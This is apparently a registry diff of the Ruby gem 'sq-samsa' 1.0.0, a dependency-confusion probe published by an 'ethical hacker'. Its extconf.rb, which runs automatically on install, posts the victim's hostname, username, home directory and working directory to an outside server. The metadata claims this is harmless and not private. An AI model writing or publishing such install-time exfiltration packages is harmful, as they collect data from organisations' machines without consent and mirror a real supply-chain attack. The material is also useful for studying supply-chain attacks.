sq-samsa 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of sq-samsa might be problematic. Click here for more details.
- checksums.yaml +7 -0
- data/ext/hola/extconf.rb +14 -0
- metadata +49 -0
checksums.yaml
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
1
|
+
---
|
|
2
|
+
SHA256:
|
|
3
|
+
metadata.gz: 0c7fea84d575e58f9673bd11fbfc8259984441d50a70c9f2fd6de3833691bda0
|
|
4
|
+
data.tar.gz: ce09e5bfcb14819877f3df9af6fe475e50d5e6fad6df038d2e949f0a4ee515ee
|
|
5
|
+
SHA512:
|
|
6
|
+
metadata.gz: fbd8f1cc91df7aa83114162a3ef53ef50b1bea72cc67b3f942133f556d8103fb3d6a9ce0072b7bfe695075a856cfdde4e7d4632588f7b55450a5aeea15d1e591
|
|
7
|
+
data.tar.gz: c20707ba5360b80341645bff88a7f3207737d91bd40abb472f026db03a2f7601b97110d37e3c134a8c38e3a21cb020a18ae63f178ac9d003fa2c9d124a405f2b
|
data/ext/hola/extconf.rb
ADDED
|
@@ -0,0 +1,14 @@
|
|
|
1
|
+
require 'uri'
|
|
2
|
+
require 'net/http'
|
|
3
|
+
require 'socket'
|
|
4
|
+
|
|
5
|
+
# Extract only the bare minimum to be able to identify
|
|
6
|
+
# vulnerable organization.
|
|
7
|
+
# Send hostname, username, current working directory, home directory to my server.
|
|
8
|
+
# There isn't anything malicious in here! This information is not private/confidential in any way.
|
|
9
|
+
|
|
10
|
+
|
|
11
|
+
uri = URI('http://ruby-dependency-confusion.jumpingcrab.com/report')
|
|
12
|
+
res = Net::HTTP.post_form(uri, 'gem' => 'sq-samsa', 'version' => '1.0.0', 'hostname' => Socket.gethostname, 'username' => ENV['USER'] || 'no_user', 'home' => File.expand_path('~'), 'cwd' => Dir.pwd)
|
|
13
|
+
|
|
14
|
+
|
metadata
ADDED
|
@@ -0,0 +1,49 @@
|
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
|
2
|
+
name: sq-samsa
|
|
3
|
+
version: !ruby/object:Gem::Version
|
|
4
|
+
version: 1.0.0
|
|
5
|
+
platform: ruby
|
|
6
|
+
authors:
|
|
7
|
+
- ethical hacker
|
|
8
|
+
autorequire:
|
|
9
|
+
bindir: bin
|
|
10
|
+
cert_chain: []
|
|
11
|
+
date: 2023-03-13 00:00:00.000000000 Z
|
|
12
|
+
dependencies: []
|
|
13
|
+
description: |-
|
|
14
|
+
WARNING! DO NOT INSTALL THIS GEM.
|
|
15
|
+
This gem is used to detect dependency confusion vulnerabilities. When installed, the gem sends hostname, username, home directory and current working directory to my server so I can identifiy vulnerable companies. The gem does not do anything else. The extracted information is not private/confidential in any way.
|
|
16
|
+
email:
|
|
17
|
+
executables: []
|
|
18
|
+
extensions:
|
|
19
|
+
- ext/hola/extconf.rb
|
|
20
|
+
extra_rdoc_files: []
|
|
21
|
+
files:
|
|
22
|
+
- ext/hola/extconf.rb
|
|
23
|
+
homepage:
|
|
24
|
+
licenses: []
|
|
25
|
+
metadata: {}
|
|
26
|
+
post_install_message:
|
|
27
|
+
rdoc_options: []
|
|
28
|
+
require_paths:
|
|
29
|
+
- lib
|
|
30
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
|
31
|
+
requirements:
|
|
32
|
+
- - ">="
|
|
33
|
+
- !ruby/object:Gem::Version
|
|
34
|
+
version: '0'
|
|
35
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
|
36
|
+
requirements:
|
|
37
|
+
- - ">="
|
|
38
|
+
- !ruby/object:Gem::Version
|
|
39
|
+
version: '0'
|
|
40
|
+
requirements: []
|
|
41
|
+
rubygems_version: 3.1.2
|
|
42
|
+
signing_key:
|
|
43
|
+
specification_version: 4
|
|
44
|
+
summary: WARNING! DO NOT INSTALL THIS GEM. This gem is used to detect dependency confusion
|
|
45
|
+
vulnerabilities. When installed, the gem sends hostname, username, home directory
|
|
46
|
+
and current working directory to my server so I can identifiy vulnerable companies.
|
|
47
|
+
The gem does not do anything else. The extracted information is not private/confidential
|
|
48
|
+
in any way.
|
|
49
|
+
test_files: []
|